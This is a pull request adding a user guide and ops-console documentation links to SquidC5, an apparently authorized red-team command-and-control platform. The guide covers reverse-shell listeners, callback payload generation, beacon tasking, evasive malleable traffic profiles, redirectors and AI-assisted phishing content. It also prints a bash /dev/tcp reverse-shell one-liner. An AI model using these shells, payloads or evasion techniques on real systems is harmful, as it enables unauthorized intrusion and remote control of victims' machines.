### PR TITLE
Ops UX overhaul + comprehensive GitHub user guide

### DIFF
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -359,6 +359,8 @@ docker exec squidc5 cat /data/admin_token.txt
 | `CLAUDE.md` | Pointer to AGENTS + docs |
 | `docs/squidc5-vision.md` | Full product vision / security architecture |
 | `docs/roadmap-2026-2027.md` | Prioritized next-gen roadmap (10 focus areas) |
+| `docs/user-guide.md` | Comprehensive features (what/why/how/examples) — GitHub only |
+| `docs/README.md` | Docs index |
 | `docs/operator-runbook.md` | Operator procedures |
 | `docs/deployment.md` | Binary prod deploy + lab Docker |
 | `README.md` | Public-facing quickstart |

--- a/README.md
+++ b/README.md
@@ -101,7 +101,10 @@ Overrides: `--url` / `--token`, or env `SQUIDC5_URL` / `SQUIDC5_TOKEN`.
 
 Auth header: `Authorization: Bearer <token>` or `X-API-Token: <token>`
 
-Interactive docs: `/docs`
+**Documentation lives on GitHub only** (not on the running server — `/docs` stays disabled):
+
+- **[User guide](docs/user-guide.md)** — features, why/how, examples  
+- **[Docs index](docs/README.md)**
 
 ### Example: create operator token & task a session
 

--- a/docs/README.md
+++ b/docs/README.md
@@ -1,0 +1,24 @@
+# SquidC5 documentation (GitHub only)
+
+These files ship in the **repository**. They are **not** exposed by the running C2 server (`/docs` and OpenAPI stay disabled).
+
+## Start here
+
+| Doc | Description |
+|-----|-------------|
+| **[User guide](user-guide.md)** | Comprehensive features: what / why / how / examples |
+| [Operator runbook](operator-runbook.md) | Short operational procedures |
+| [Deployment](deployment.md) | Lab Docker + production binary deploy |
+| [Vision](squidc5-vision.md) | Product & security architecture |
+| [Threat model](threat-model.md) | Trust boundaries |
+| [Roadmap 2026–2027](roadmap-2026-2027.md) | Planned work |
+
+## Deep links (ops UI)
+
+The `/ops` console links into the user guide anchors, for example:
+
+- https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md#listeners  
+- https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md#c2-profiles  
+- https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md#admin-ai  
+
+Full index of sections is the heading list in [user-guide.md](user-guide.md).

--- a/docs/user-guide.md
+++ b/docs/user-guide.md
@@ -1,0 +1,725 @@
+# SquidC5 User Guide
+
+**Authorized red team / penetration testing only.**  
+This guide lives in the GitHub repository. It is **not** served by the C2 process (`/docs` on the server stays disabled).
+
+**Source of truth:** [docs/user-guide.md](https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md) on branch `master`.
+
+| Related docs | Purpose |
+|--------------|---------|
+| [Operator runbook](operator-runbook.md) | Short how-to procedures |
+| [Deployment](deployment.md) | Docker lab + binary prod |
+| [Vision](squidc5-vision.md) | Product / security architecture |
+| [Threat model](threat-model.md) | Trust boundaries |
+| [Roadmap](roadmap-2026-2027.md) | Planned work |
+
+---
+
+## Overview
+
+### What SquidC5 is
+
+SquidC5 is a **security-first, AI-native command-and-control (C2)** platform for **authorized** engagements. Operators use:
+
+- **REST API** (scoped tokens)
+- **Ops UI** at `/ops` (browser console)
+- **CLI** `sc5` / `squidc5-cli`
+
+### Why it is designed this way
+
+- **Deny by default** — MCP off, public OpenAPI off, empty CORS, admin UI only after server-side scope check
+- **Deterministic implants** — templates and fixed generators over free-form agent loops
+- **Auditability** — operator, AI, MCP, and feature changes go through policy/audit
+- **Port flexibility** — no hard requirement for 80/443
+
+### High-level architecture
+
+```text
+Operator (CLI /ops)
+    → API (scopes + policy)
+        → Sessions / Tasks / Listeners / Payloads
+        → Admin AI (sandboxed) / MCP (allow-listed)
+        → SQLite data/ (local, never commit)
+Implants / reverse shells → Listeners → Sessions
+```
+
+---
+
+## Security model
+
+### What
+
+- **Tokens** `sc5_<urlsafe>` with scopes (`admin`, `sessions:read`, `shell:interact`, …)
+- **Admin UI code** (`console.js`) only after the server validates the token
+- **Admin AI** sanitizes untrusted input; capabilities are allow-listed
+- **MCP** tools are per-token allow-listed; feature often off by default
+- **Public docs** hard-locked off on the running server
+
+### Why
+
+A compromised browser or leaked non-admin token must not receive admin control surface or open-ended AI tooling.
+
+### How
+
+```bash
+# Bootstrap token (first start) — store securely, rotate
+cat data/admin_token.txt   # local
+# docker exec squidc5 cat /data/admin_token.txt
+
+sc5 login --url http://HOST:8443 --token sc5_...
+sc5 whoami
+```
+
+---
+
+## Ops console
+
+### What
+
+Browser UI at `http://HOST:8443/ops`. Connection settings stay in **browser localStorage** only. Layout order, wide tiles, and panel open state are also local — **never** persisted to the C2 server.
+
+### Why
+
+Operators need a phone-friendly and desktop console without shipping secrets back into git or requiring server-side UI preferences.
+
+### How
+
+1. Open `/ops` on the C2 host (same-origin avoids CORS issues).
+2. Paste **API token** → **Save & Connect**.
+3. Connection panel collapses when a token is saved.
+4. Drag **⋮⋮** to reorder cards; **⟷** expands a card to a full row (local only).
+
+### Example
+
+```text
+http://127.0.0.1:8443/ops
+Token: sc5_… (from data/admin_token.txt)
+```
+
+---
+
+## Connection
+
+### What
+
+Server URL, API token, and refresh interval for the ops UI.
+
+### Why
+
+The UI is a pure client. Without a token, only public shell HTML loads; admin panels load only after `/api/v1/ops/console.js` accepts the token.
+
+### How
+
+| Field | Meaning |
+|-------|---------|
+| Server URL | Base URL, e.g. `http://159.x.x.x:8443` |
+| API token | `sc5_…` Bearer token |
+| Refresh | Poll interval for sessions/metrics/events |
+
+### Example (CLI equivalent)
+
+```bash
+sc5 login --url http://HOST:8443 --token sc5_...
+sc5 config
+```
+
+---
+
+## Event stream
+
+### What
+
+Live feed of recent server events (shell connect/verify/reject, listeners, tasks, etc.), newest first.
+
+### Why
+
+Operators watch check-ins without opening full audit or metrics dumps.
+
+### How
+
+Populated from `GET /api/v1/metrics` → `recent_events`. Refreshes with the Connection poll interval.
+
+### Example events
+
+| Type | Meaning |
+|------|---------|
+| `shell.connected` | Inbound reverse shell TCP accepted |
+| `shell.verified` | Exec probe passed |
+| `session.rejected` / `shell.false_positive` | Noise/scanner dropped |
+| `listener.started` | Listener bound and running |
+
+---
+
+## Status overview
+
+### What
+
+Dashboard tiles: verified shells, listeners up, active sessions, open tasks, HTTP hits, stabilized count, false shells, AI calls, uptime.
+
+### Why
+
+One glance at engagement health before diving into panels.
+
+### How
+
+Aggregates `/api/v1/sessions`, `/api/v1/listeners`, `/api/v1/tasks`, and metrics counters. Height always fits content (not a fixed scroll tile).
+
+---
+
+## Identity
+
+### What
+
+Who the current token is: actor name, type, token id prefix, and **scopes**.
+
+### Why
+
+Scopes gate every panel and API route. Mis-scoped tokens look “broken” until you inspect identity.
+
+### How
+
+- UI: **Whoami** → `GET /api/v1/meta`
+- **Health** → `GET /api/v1/health` (no secrets)
+
+### Example
+
+```bash
+sc5 whoami
+# scopes: admin, sessions:read, shell:interact, ...
+```
+
+---
+
+## Shell
+
+### What
+
+Interactive command runner for **verified reverse shells** only.
+
+### Why
+
+Unverified or echo-only sockets are dangerous noise (scanners, TLS handshakes). Exec probe + false-shell filter ensure only real shells get operator commands.
+
+### How
+
+1. Start a `reverse_shell` listener and get a verified session.
+2. Select session → enter command → **Run**.
+3. **All verified** broadcasts to every verified shell.
+4. **Buffer** reads captured session output (`GET /api/v1/sessions/{id}/output`).
+
+### Example
+
+```bash
+sc5 listeners create rev 4444 --kind reverse_shell
+sc5 listeners start <id>
+# target (authorized): bash -i >& /dev/tcp/HOST/4444 0>&1
+sc5 sessions list --shells
+sc5 shell <session_id> "whoami"
+sc5 shell all "id"
+```
+
+### Why stage-2 stabilize
+
+Raw reverse shells die on network blips. Auto-stabilize injects a reconnecting agent (Linux Python / Windows PowerShell) that re-checks in and supports reliable command execution.
+
+---
+
+## Sessions
+
+### What
+
+All tracked implant/shell connections (beacons, reverse shells, closed).
+
+### Why
+
+Sessions are the unit of tasking and shell interaction. Reaping drops zombies so operators are not fooled by “live but mute” entries.
+
+### How
+
+| Action | Behavior |
+|--------|----------|
+| List all | Full session table |
+| Reap dead | Probe and close dead/mute shells |
+| Close selected | Closes shell chosen in Shell panel |
+
+### Example
+
+```bash
+sc5 sessions list
+sc5 sessions list --shells --include-dead
+sc5 sessions reap
+sc5 sessions close <id>
+```
+
+---
+
+## Tasks
+
+### What
+
+Async command queue for **beacon** implants (not interactive reverse shells).
+
+### Why
+
+Beacons check in on a schedule. Tasks wait until the next poll, then return results — suitable for intermittent/low-and-slow C2.
+
+### How
+
+1. Get beacon `session_id` from sessions list.
+2. Create task with command.
+3. Poll task status until complete.
+
+### Example
+
+```bash
+sc5 tasks create <beacon_session_id> "id"
+sc5 tasks get <task_id>
+sc5 tasks list --session <beacon_session_id>
+```
+
+---
+
+## Listeners
+
+### What
+
+Server-side acceptors for implant traffic.
+
+### Why
+
+Different channels need different sockets: raw TCP shells vs HTTP beacons vs DNS.
+
+### How to set up
+
+1. **Create** name + port + kind.
+2. **Start** until status is `running`.
+3. Open host firewall for that port.
+4. Point payloads/shells at `HOST:port`.
+
+| Kind | Use |
+|------|-----|
+| `reverse_shell` | bash `/dev/tcp`, python reverse shells |
+| `http` | HTTP beacon check-ins |
+| `tcp` | Generic TCP channel |
+| `dns` | DNS TXT C2 (set zone) |
+
+### Privileged ports
+
+Non-root process: ports &lt; 1024 need host sysctl  
+`net.ipv4.ip_unprivileged_port_start=0`.
+
+### Example
+
+```bash
+sc5 listeners create rev 443 --kind reverse_shell --host 0.0.0.0
+sc5 listeners start <id>
+sc5 listeners list
+```
+
+Docker **host** networking binds real host ports. Bridge mode requires publishing every listener port.
+
+---
+
+## Payloads and implants
+
+### What
+
+Deterministic stagers/agents that call back to your listeners.
+
+### Why
+
+Generated payloads are reviewable and reproducible. Prefer templates over opaque loaders for authorized ops and audit.
+
+### How
+
+1. Choose template or implant family.
+2. Set callback **host** and **port** (scheme/zone if needed).
+3. **Generate** and run **only on authorized targets**.
+4. For HTTP surface shape, activate a **C2 profile** first, then generate.
+
+### Example templates
+
+| Template | Listener |
+|----------|----------|
+| `reverse_shell_bash` / `reverse_shell_python` | `reverse_shell` |
+| `http_beacon_python` / `http_beacon_bash` | `http` (often on API port) |
+| `dns_beacon_python` | `dns` + zone |
+| `ws_beacon_python` | WebSocket routes |
+
+```bash
+sc5 payloads templates
+sc5 payloads generate reverse_shell_bash 203.0.113.10 4444 --raw
+sc5 payloads generate http_beacon_python 203.0.113.10 8443 --raw
+```
+
+---
+
+## Plugins
+
+### What
+
+Optional signed/catalog server extensions (e.g. lab recon helpers).
+
+### Why
+
+Keep core binary small; add curated capabilities without open-ended remote code from the internet. Plugins remain allow-listed under policy.
+
+### How
+
+1. **Catalog** — list available modules.
+2. **Install + enable** by catalog name.
+3. **Installed** — what is loaded.
+
+### Example
+
+```text
+Ops → Plugins → Catalog → install "lab_recon" → Install + enable
+```
+
+---
+
+## Redirector and certificates
+
+### What
+
+OpSec helpers: nginx reverse-proxy snippet and TLS cert plan text.
+
+### Why
+
+Fronting C2 through a redirector/CDN reduces direct exposure of the team server.
+
+### How
+
+- Enter `server_name` and beacon URI paths.
+- **Nginx snippet** → copy to redirector host.
+- **Cert plan** → issuance steps (does not auto-issue on the droplet).
+
+### Example
+
+```text
+server_name: cdn.lab.example
+uris: /jquery.js,/api/sync
+→ generate nginx location blocks pointing at team server
+```
+
+---
+
+## Observability
+
+### What
+
+Metrics counters and append-only **audit** log of operator/API actions.
+
+### Why
+
+After-action review, dispute resolution, and detection of misuse of the C2 itself.
+
+### How
+
+```bash
+sc5 metrics
+sc5 audit --limit 50
+sc5 events   # SSE stream if available
+```
+
+UI: **Metrics** / **Audit log** buttons dump JSON into the panel outbox.
+
+---
+
+## Admin AI
+
+### What
+
+Sandboxed, **allow-listed** AI capabilities on the server (not free-form agents).
+
+### Why
+
+Assist recon docs, shell classification, payload hints — without feeding raw hostile session output into unconstrained agent loops. Untrusted text is sanitized.
+
+### How
+
+1. Configure an LLM under **LLM connections** (optional).
+2. Without LLM → offline/deterministic fallbacks.
+3. Pick capability + input → **Run AI**.
+
+| Capability | Intent |
+|------------|--------|
+| `recon_assist` | Structured recon suggestions |
+| `shell_classify` | Classify shell/session context |
+| `payload_template` | Template guidance |
+| `phishing_asset` | Authorized phishing content assist |
+| `doc_generate` | Engagement documentation drafts |
+
+### Example
+
+```bash
+sc5 ai recon_assist --data "windows domain, no creds yet"
+sc5 ai shell_classify --data "session looks like scanner"
+```
+
+---
+
+## LLM connections
+
+### What
+
+BYO OpenAI-compatible endpoints (including xAI Grok) stored **server-side** in `data/`.
+
+### Why
+
+Admin AI needs a model; keys must never return in status APIs or git.
+
+### How
+
+```bash
+sc5 llm add grok-prod grok-4 --provider xai --base-url https://api.x.ai/v1 --api-key "$XAI_KEY"
+sc5 llm list
+```
+
+Status: `GET /api/v1/ai/status` shows provider/model presence, **not** the key.
+
+---
+
+## Tokens
+
+### What
+
+Mint and revoke scoped API tokens for operators, automation, or MCP.
+
+### Why
+
+Least privilege: phone UI might only need `shell:interact` + `sessions:read`; external AI needs `mcp:connect` + tool allow-list.
+
+### How
+
+1. Choose preset (operator / read-only / listener / AI / admin / custom).
+2. **Mint** — raw `sc5_…` shown **once**.
+3. Revoke from list if compromised.
+
+### Example
+
+```bash
+sc5 tokens create phone --scopes "sessions:read,shell:interact,metrics:read"
+sc5 tokens list
+sc5 tokens revoke <id>
+```
+
+---
+
+## Timeline and reports
+
+### What
+
+Anomaly hints, chronological timeline, exportable engagement report.
+
+### Why
+
+Handoff and after-action need more than raw audit lines.
+
+### How
+
+Ops panel buttons call observability endpoints (metrics/audit scoped). Export for offline notes — still authorized-use only.
+
+---
+
+## Operator chat
+
+### What
+
+Short shared notes between operators on this instance.
+
+### Why
+
+Handoff without external chat leaking engagement context.
+
+### How
+
+Send message → stored server-side → visible to `collab:use` / admin tokens.
+
+---
+
+## C2 profiles
+
+### What
+
+**Malleable** traffic profiles: how HTTP (and related) beacons look on the wire — paths, headers, jitter, decoy behavior.
+
+### Why
+
+Default C2 fingerprints are easy to detect. Profiles change the expected surface so traffic can blend with legitimate patterns for the engagement.
+
+### How
+
+1. List profiles → **activate** one.
+2. **Generate beacon (active)** so implants match that profile.
+3. After switching profiles, **regenerate** implants — old beacons may miss the new surface.
+
+### Example
+
+```text
+Ops → C2 profiles → activate "jquery-cdn" → Generate beacon (active)
+# payload uses profile paths/headers; server expects the same
+```
+
+---
+
+## Feature toggles
+
+### What
+
+Runtime kill-switches enforced by the server (MCP, AI paths, etc.).
+
+### Why
+
+Incident response: disable a capability without redeploying. Defaults stay secure; `public_docs` cannot be enabled.
+
+### How
+
+```bash
+# API (admin)
+curl -H "Authorization: Bearer $TOK" http://HOST:8443/api/v1/features
+```
+
+UI: flip toggles → **Save features**.
+
+---
+
+## Policy
+
+### What
+
+Risk / allow-deny engine: thresholds, HITL gates, chain limits.
+
+### Why
+
+High-risk actions can require human approval or be denied outright — rails for AI and automation.
+
+### How
+
+1. **Get policy** — current JSON.
+2. Edit carefully → **Save policy**.
+3. Bad policy can lock operators out or weaken guardrails — treat as production config.
+
+### Example
+
+```bash
+sc5 policy get
+sc5 policy set --file rules.json
+```
+
+---
+
+## MCP tools
+
+### What
+
+Bridge for **external** AI/tools (Model Context Protocol style) under per-token allow-lists.
+
+### Why
+
+External models must not get open-ended shell on the C2. Each tool call is single-step, scoped, and auditable. MCP is **off by default** until enabled.
+
+### How
+
+1. Enable MCP via features/settings when approved.
+2. Token needs `mcp:connect` + `mcp_tools` allow-list.
+3. **List tools** / **Call** with JSON args.
+
+### Example
+
+```bash
+sc5 mcp tools
+sc5 mcp call list_sessions --args-json '{}'
+```
+
+---
+
+## Verified reverse shells (overview card)
+
+### What
+
+Live TCP reverse shells that passed classification + exec probe.
+
+### Why
+
+Prefer these for Shell commands. Dead/echo-only connections are reaped.
+
+### How
+
+See [Shell](#shell) and [Listeners](#listeners).
+
+---
+
+## Signal
+
+### What
+
+Quick metric chips from the last poll (stabilized, false positives, AI calls, etc.).
+
+### Why
+
+Confirm the API is healthy and counters are moving without opening Observability.
+
+---
+
+## CLI reference
+
+Primary entry points after install:
+
+```bash
+sc5 login --url <base> --token <sc5_...>
+sc5 health | whoami | metrics | audit | events | repl
+sc5 sessions list|get|close|reap
+sc5 tasks list|get|create
+sc5 listeners list|create|start|stop|delete
+sc5 payloads templates|generate
+sc5 shell <session_id> "<cmd>"
+sc5 tokens list|create|revoke
+sc5 ai <capability> [--data "..."]
+sc5 llm list|add
+sc5 mcp tools|call
+sc5 policy get|set
+```
+
+Config: `~/.config/squidc5/config.json` (never commit).  
+Env: `SQUIDC5_URL`, `SQUIDC5_TOKEN`.
+
+Full surface also documented in [AGENTS.md](../AGENTS.md) (developer/agent memory).
+
+---
+
+## Deployment
+
+### Lab (Docker)
+
+```bash
+docker compose up --build -d
+docker exec squidc5 cat /data/admin_token.txt
+```
+
+### Production (binary only)
+
+1. PR → CI green → merge `master`
+2. CI builds `squidc5-linux-x64` + release
+3. Deploy **that binary only**; keep `data/` intact
+
+See [deployment.md](deployment.md). **Do not** rsync WIP source to prod.
+
+---
+
+## Troubleshooting
+
+| Symptom | Checks |
+|---------|--------|
+| Reverse shell never appears | Listener `running`? Firewall? Port publish (Docker bridge)? Privileged port sysctl? |
+| Shell listed but mute | Exec probe failed → reaped; check false-shell filter / stage-2 |
+| Admin panels missing | Token scopes? Hard-refresh? `console.js` 403? |
+| CORS errors | Open `/ops` on the C2 host, not `file://` or wrong origin |
+| Beacon no tasks | Wrong session id? Profile mismatch? Listener kind `http`? |
+| AI offline only | No LLM configured under LLM connections |
+
+---
+
+## Authorized use reminder
+
+SquidC5 is for **legitimate, authorized** security testing only. Unauthorized access to computer systems is illegal. Operators are responsible for engagement scope, rules of engagement, and data handling.

--- a/web/ops-admin.js
+++ b/web/ops-admin.js
@@ -20,74 +20,86 @@
     }
   }
 
-  function panel(id, title, body, open) {
+  const DOCS_BASE = "https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md";
+
+  function docLink(anchor, label) {
+    const href = DOCS_BASE + "#" + anchor;
+    return `<a class="doc-link" href="${href}" target="_blank" rel="noopener noreferrer" title="Open GitHub documentation">${label || "Docs"}</a>`;
+  }
+
+  function panel(id, title, body, open, docAnchor) {
     // Desktop: expanded by default; mobile: always start collapsed
     const isOpen = isDesktopLayout() && open !== false;
+    const docs = docAnchor
+      ? `<a class="doc-link summary-doc" href="${DOCS_BASE}#${docAnchor}" target="_blank" rel="noopener noreferrer" title="Documentation on GitHub" onclick="event.stopPropagation()">Docs</a>`
+      : "";
     return `<details class="panel" id="${id}"${isOpen ? " open" : ""}>
-      <summary>${title}</summary>
-      ${body}
+      <summary>
+        <span class="drag-handle" draggable="true" title="Drag to reorder">⋮⋮</span>
+        <span class="panel-title">${title}</span>
+        ${docs}
+        <button type="button" class="wide-btn" title="Toggle full-width row">⟷</button>
+      </summary>
+      <div class="panel-body">${body}</div>
     </details>`;
   }
 
-  function hint(text) {
-    return `<p class="hint">${text}</p>`;
+  function hint(text, docAnchor) {
+    const more = docAnchor
+      ? ` ${docLink(docAnchor, "Full docs →")}`
+      : "";
+    return `<p class="hint">${text}${more}</p>`;
   }
 
   const parts = [];
 
   // ----- Identity -----
-  parts.push(`
-    <div class="card" id="identityCard">
-      <h2>Identity</h2>
-      ${hint("Who you are on this C2: the API token currently saved in Connection. Pulled from <code>GET /api/v1/meta</code> — actor name, token id, and scopes the server granted. Scopes control which panels and API routes work; <code>admin</code> unlocks full console. Whoami dumps the raw meta JSON; Health is a lightweight liveness check (no secrets).")}
-      <p class="muted mono" id="whoLine">—</p>
-      <div class="chips" id="scopeChips" style="margin-top:8px"></div>
-      <div class="row" style="margin-top:8px">
-        <button type="button" id="whoamiBtn">Whoami</button>
-        <button type="button" id="healthBtn">Health</button>
-      </div>
-      <div class="outbox empty-out" id="identOut" style="margin-top:8px">—</div>
+  parts.push(panel("identityCard", "🪪 Identity", `
+    ${hint("Who you are on this C2: the API token currently saved in Connection. Pulled from <code>GET /api/v1/meta</code> — actor name, token id, and scopes the server granted. Scopes control which panels and API routes work; <code>admin</code> unlocks full console. Whoami dumps the raw meta JSON; Health is a lightweight liveness check (no secrets).", "identity")}
+    <p class="muted mono" id="whoLine">—</p>
+    <div class="chips" id="scopeChips" style="margin-top:8px"></div>
+    <div class="row" style="margin-top:8px">
+      <button type="button" id="whoamiBtn">Whoami</button>
+      <button type="button" id="healthBtn">Health</button>
     </div>
-  `);
+    <div class="outbox empty-out" id="identOut" style="margin-top:8px">—</div>
+  `, true, "identity"));
 
   // ----- Shell interact -----
   if (can("shell:interact")) {
-    parts.push(`
-      <div class="card" id="quickRunCard">
-        <h2>Shell</h2>
-        ${hint("Interactive command runner for <strong>verified reverse shells</strong> only (exec-probe passed). Pick a live session, run a command, or broadcast to all verified shells. Buffer shows recent session output already captured by the server — not a live PTY stream.")}
-        <label for="shellSelect">Target shell</label>
-        <select id="shellSelect"><option value="">(none)</option></select>
-        <label for="shellCmd">Command</label>
-        <textarea id="shellCmd" placeholder="whoami"></textarea>
-        <div class="row">
-          <button type="button" class="primary" id="runShellBtn">Run</button>
-          ${can("shell:interact") ? '<button type="button" id="runAllBtn">All verified</button>' : ""}
-          <button type="button" id="dumpOutBtn">Buffer</button>
-        </div>
-        <h2 style="margin-top:12px">Output</h2>
-        <div class="outbox empty-out" id="shellOut">Run a command to see output here.</div>
+    parts.push(panel("quickRunCard", "⌨ Shell", `
+      ${hint("Interactive command runner for <strong>verified reverse shells</strong> only (exec-probe passed). Pick a live session, run a command, or broadcast to all verified shells. Buffer shows recent session output already captured by the server — not a live PTY stream.", "shell")}
+      <label for="shellSelect">Target shell</label>
+      <select id="shellSelect"><option value="">(none)</option></select>
+      <label for="shellCmd">Command</label>
+      <textarea id="shellCmd" placeholder="whoami"></textarea>
+      <div class="row">
+        <button type="button" class="primary" id="runShellBtn">Run</button>
+        ${can("shell:interact") ? '<button type="button" id="runAllBtn">All verified</button>' : ""}
+        <button type="button" id="dumpOutBtn">Buffer</button>
       </div>
-    `);
+      <h2 style="margin-top:12px">Output</h2>
+      <div class="outbox empty-out" id="shellOut">Run a command to see output here.</div>
+    `, true, "shell"));
   }
 
   // ----- Sessions -----
   if (can("sessions:read") || can("sessions:write")) {
     parts.push(panel("sessionsPanel", "📡 Sessions", `
-      ${hint("Every implant or reverse-shell connection the server tracks (beacons, shells, closed). <strong>Reap dead</strong> probes and drops mute/zombie shells. <strong>Close selected</strong> uses the Shell dropdown target. List all dumps the full session table for forensics.")}
+      ${hint("Every implant or reverse-shell connection the server tracks (beacons, shells, closed). <strong>Reap dead</strong> probes and drops mute/zombie shells. <strong>Close selected</strong> uses the Shell dropdown target. List all dumps the full session table for forensics.", "sessions")}
       <div class="row">
         ${can("sessions:write") ? '<button type="button" id="reapBtn">Reap dead</button>' : ""}
         ${can("sessions:write") ? '<button type="button" class="danger" id="closeShellBtn">Close selected</button>' : ""}
         <button type="button" id="listAllSesBtn">List all</button>
       </div>
       <div id="sesExtra" class="outbox empty-out" style="margin-top:8px">—</div>
-    `, true));
+    `, true, "sessions"));
   }
 
   // ----- Tasks (beacons) -----
   if (can("tasks:read") || can("tasks:write")) {
     parts.push(panel("tasksPanel", "📋 Tasks", `
-      ${hint("Async work queue for <strong>beacon</strong> implants (not interactive reverse shells). Create a task against a beacon session id; the implant picks it up on next check-in and returns output when complete. Use List tasks to poll status.")}
+      ${hint("Async work queue for <strong>beacon</strong> implants (not interactive reverse shells). Create a task against a beacon session id; the implant picks it up on next check-in and returns output when complete. Use List tasks to poll status.", "tasks")}
       ${can("tasks:write") ? `
         <label for="taskSession">Session id</label>
         <input id="taskSession" placeholder="beacon session id" autocomplete="off" />
@@ -99,13 +111,13 @@
         </div>
       ` : `<div class="row"><button type="button" id="listTasksBtn">List tasks</button></div>`}
       <div class="outbox empty-out" id="taskOut" style="margin-top:8px">—</div>
-    `, true));
+    `, true, "tasks"));
   }
 
   // ----- Listeners -----
   if (can("listeners:read") || can("listeners:write")) {
     parts.push(panel("listenersPanel", "🎧 Listeners", `
-      ${hint("Server-side sockets that accept implant traffic. <strong>How to set up:</strong> (1) Create with a name + port + kind, (2) ensure Start shows running, (3) open the host firewall for that port, (4) point payloads/shells at this host:port. <strong>Kinds:</strong> <code>reverse_shell</code> = raw TCP shells (bash /dev/tcp, etc.); <code>http</code> = HTTP beacon check-ins; <code>tcp</code> = generic TCP channel; <code>dns</code> = DNS TXT C2 (set zone). Privileged ports (&lt;1024) need host sysctl if the process is non-root.")}
+      ${hint("Server-side sockets that accept implant traffic. <strong>How to set up:</strong> (1) Create with a name + port + kind, (2) ensure Start shows running, (3) open the host firewall for that port, (4) point payloads/shells at this host:port. <strong>Kinds:</strong> <code>reverse_shell</code> = raw TCP shells (bash /dev/tcp, etc.); <code>http</code> = HTTP beacon check-ins; <code>tcp</code> = generic TCP channel; <code>dns</code> = DNS TXT C2 (set zone). Privileged ports (&lt;1024) need host sysctl if the process is non-root.", "listeners")}
       <label for="listenerSelect">Listener</label>
       <select id="listenerSelect"><option value="">(none)</option></select>
       ${can("listeners:write") ? `
@@ -132,13 +144,13 @@
           <button type="button" class="primary" id="createLisBtn">Create + start</button>
         </div>
       ` : ""}
-    `, true));
+    `, true, "listeners"));
   }
 
   // ----- Payloads -----
   if (can("payloads:generate")) {
     parts.push(panel("payloadsPanel", "💣 Payloads / implants", `
-      ${hint("Deterministic stagers/agents that call back to your listeners. Pick a template (or implant family), set callback host/port (and scheme/zone if needed), Generate, then run only on authorized targets. Reverse-shell templates need a <code>reverse_shell</code> listener; HTTP/DNS/WS beacons need matching listener kinds and usually an active C2 profile for HTTP surface shape.")}
+      ${hint("Deterministic stagers/agents that call back to your listeners. Pick a template (or implant family), set callback host/port (and scheme/zone if needed), Generate, then run only on authorized targets. Reverse-shell templates need a <code>reverse_shell</code> listener; HTTP/DNS/WS beacons need matching listener kinds and usually an active C2 profile for HTTP surface shape.", "payloads-and-implants")}
       <label for="payTpl">Template</label>
       <select id="payTpl">
         <option value="http_beacon_python">http_beacon_python</option>
@@ -184,13 +196,13 @@
         <button type="button" id="genImpBtn">Generate implant</button>
       </div>
       <div class="outbox empty-out" id="payOut" style="margin-top:8px">—</div>
-    `, true));
+    `, true, "payloads-and-implants"));
   }
 
   // ----- Plugins -----
   if (can("plugins:manage") || can("admin")) {
     parts.push(panel("pluginsPanel", "🧩 Plugins", `
-      ${hint("Optional server extensions (signed catalog modules) that add curated capabilities — e.g. lab recon helpers — without shipping them in the core binary. Catalog lists available modules; Install + enable loads one by name and turns it on under policy. Plugins stay allow-listed; they are not arbitrary remote code from the internet.")}
+      ${hint("Optional server extensions (signed catalog modules) that add curated capabilities — e.g. lab recon helpers — without shipping them in the core binary. Catalog lists available modules; Install + enable loads one by name and turns it on under policy. Plugins stay allow-listed; they are not arbitrary remote code from the internet.", "plugins")}
       <div class="row">
         <button type="button" id="plugCatBtn">Catalog</button>
         <button type="button" id="plugListBtn">Installed</button>
@@ -201,13 +213,13 @@
         <button type="button" class="primary" id="plugInstallBtn">Install + enable</button>
       </div>
       <div class="outbox empty-out" id="plugOut" style="margin-top:8px">—</div>
-    `, true));
+    `, true, "plugins"));
   }
 
   // ----- Deploy helpers -----
   if (can("admin") || can("listeners:write")) {
     parts.push(panel("deployPanel", "🛡 Redirector / certs", `
-      ${hint("OpSec helpers for fronting the C2. Nginx snippet builds a sample reverse-proxy config (server_name + beacon URI paths) for a redirector/CDN hop. Cert plan outlines TLS issuance steps for that hostname — it does not auto-issue certificates on the droplet.")}
+      ${hint("OpSec helpers for fronting the C2. Nginx snippet builds a sample reverse-proxy config (server_name + beacon URI paths) for a redirector/CDN hop. Cert plan outlines TLS issuance steps for that hostname — it does not auto-issue certificates on the droplet.", "redirector-and-certificates")}
       <input id="redirName" placeholder="server_name e.g. cdn.lab" />
       <input id="redirUris" placeholder="beacon uris comma-sep" />
       <div class="row">
@@ -215,25 +227,25 @@
         <button type="button" id="certPlanBtn">Cert plan</button>
       </div>
       <div class="outbox empty-out" id="deployOut" style="margin-top:8px">—</div>
-    `, true));
+    `, true, "redirector-and-certificates"));
   }
 
   // ----- Metrics / Audit -----
   if (can("metrics:read") || can("audit:read")) {
     parts.push(panel("obsPanel", "📈 Observability", `
-      ${hint("Live counters (sessions, tasks, AI calls, etc.) and the append-only audit trail of operator/API actions. Use this to verify what happened and when — not a full SIEM, but the authoritative in-product log.")}
+      ${hint("Live counters (sessions, tasks, AI calls, etc.) and the append-only audit trail of operator/API actions. Use this to verify what happened and when — not a full SIEM, but the authoritative in-product log.", "observability")}
       <div class="row">
         ${can("metrics:read") ? '<button type="button" id="metricsBtn">Metrics</button>' : ""}
         ${can("audit:read") ? '<button type="button" id="auditBtn">Audit log</button>' : ""}
       </div>
       <div class="outbox" id="adminOut" style="margin-top:8px"></div>
-    `, true));
+    `, true, "observability"));
   }
 
   // ----- Admin AI -----
   if (can("ai:use")) {
     parts.push(panel("aiCard", "✨ Admin AI", `
-      ${hint("Sandboxed, allow-listed AI capabilities on the server (not free-form agents). Uses your configured LLM if present, otherwise offline/deterministic fallbacks. Untrusted session text is sanitized before prompts. Pick a capability, pass structured input, Run AI — results are auditable.")}
+      ${hint("Sandboxed, allow-listed AI capabilities on the server (not free-form agents). Uses your configured LLM if present, otherwise offline/deterministic fallbacks. Untrusted session text is sanitized before prompts. Pick a capability, pass structured input, Run AI — results are auditable.", "admin-ai")}
       <div class="stats" style="margin-bottom:8px">
         <div class="stat"><div class="n" id="aiStatusN" style="font-size:0.95rem">—</div><div class="l">Status</div></div>
         <div class="stat"><div class="n" id="aiModeN" style="font-size:0.95rem">—</div><div class="l">Mode</div></div>
@@ -257,13 +269,13 @@
         <button type="button" id="aiDebugBtn">Debug</button>
       </div>
